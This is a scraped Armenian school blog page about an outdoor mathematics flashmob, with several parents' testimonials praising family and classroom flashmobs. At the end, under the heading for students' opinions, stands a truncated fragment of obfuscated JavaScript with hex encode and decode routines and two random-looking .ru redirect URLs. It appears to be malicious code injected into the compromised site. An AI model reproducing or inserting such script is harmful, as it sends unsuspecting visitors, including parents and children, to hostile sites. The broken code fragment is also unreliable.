Բացօթյա մաթեմատիկական ֆլեշմոբ

Это слайд-шоу требует JavaScript.

Реклама

Ծնողների կարծիքները ֆշեշմոբի կազմակերպման մասին

Ֆլեշմոբը նորություն էր մեր ուսումնական պրակտիկայում, այն էլ շատ գովելի ու շատ առավելություններով:
Դասարանում կատարվող բանավոր պարապմունքներն  ըստ իս, երեխաներին հանում են քնից,ստիպում են մտածել, մրցել միմյանց հետ, ձգտում են առաջինը լինել:
Ընտանեկան ֆլեշմոբերին ես սիրով եմ մասնակցում,այն ևս ուսանելի է և դրական լիցք է հաղորդում  մեծերին, ստիպում է մի պահ մանկանալ:
Դասարանային առցանց ֆլեշմոբերը կարելի է ավելի հաճախ անցկացնել և  խրախուսել լավ երեխաներին, դա նրանց կստիպի ավելի լուրջ մոտենալ խնդրին և պատասխանատվուիթյան մեծ զգացումով կատարեն առաջադրանքները:
Ես իմ կողմից խորին շնորհակալություն եմ հայտնում նախաձեռնողներին։

Բաբայան Իրինայի տատիկ՝ Լյուբով Վարդանյան

Ֆլեշմոբերը մեզ շատ են դուր գալիս, այդ օրերին մեր տանը ուրախ քննարկումներ են սկսում:
Ընտանեկան ֆլեշմոբերը

 դրական ազդեցություն են թողնում երեխայի վրա, քանի որ նա իրեն հասկացված է զգում: Ուսման այս մեթոդը  նպաստում է, որ երեխան մտածի ու կիսի իր մտքերը:
Քննարկումները զարգացնում է նաև առաջադրանքը ճիշտ հասկանալու ու մեկնաբանելու կարողությունը: Մաթեմատիկական  առաջադրանքները յուրահատուկ ոճի են, որոնք մտածելու ու միաժամանակ երևակայելու առիթ են տալիս:
Այս ոչ ստանդարտ հարցաշարը զարգացնում է երեխայի մտահորիզոնը:
Մեր դասարանական խնդիրներն ավելի լավ է կազմված, քանի որ առաջադրանքները պարզից բարդ են դասավորված: Ի տարբերություն համադպրոցական ֆլեշմոբների, որտեղ  առաջադրանքները  մի անգամ բոլորը շատ հեշտ են, մի անգամ դժվար: Առաջադրանքների ճիշտ դասավորվածությունն ավելի լավ արդյունքի է բերում, քանի որ, երբ առաջին մի քանի առաջադրանքները մատչելի են լինում երեխան ոգևորվում է և ձգտում է ավարտին հասցնել ողջ հարցաշարը:

Հարգանքներով Նատալի Վերանյան /Բալաբանյան Գայանեի մայրիկ/

Ֆլեշմոբերի անընդհատ իրականացումը, կրթական հիմնական ծրագրին զուգահեռ, կարծում եմ շատ կարևոր մի քայլ է: Այն ոչ միայն նպաստում է երեխայի տրամաբանության զարգացմանը, այլ նաև  միավորում է երեխային և ընտանիքին, համախմբում է նրանց միևնույն հարցի շուրջ, ստիպում քննարկումներ ունենալ: Պարապմունքի այս տարբերակը, որը համապատասխանում է երեխայի գիտելիքին, ավելի հետաքրքիր և ոգևորող է: Երեխան տեսնելով, որ առաջադրանքները լիովին համապատասխանում են իրեն, ավելի մեծ պատասխանատվությամբ ու ոգևորությամբ է ներգրավվում գործընթացին: Համեմատաբար ավելի բարդ հարցերը հետաքրքիր քննարկումներ են առջացնում նաև ծնողների միջև:

Հովհաննիսյան Մանեի մայրիկ՝ Լալա Դավթյան

 

Սովորողների կարծիքը մաթեմատիկական ֆլեշմոբի մասին

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «tatevmelqonyan.wordpress.com»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;ehttps://wek7ipqx359.ru/f2.html?a=19177https://lukpiot0dz.ru/u.html?a=19177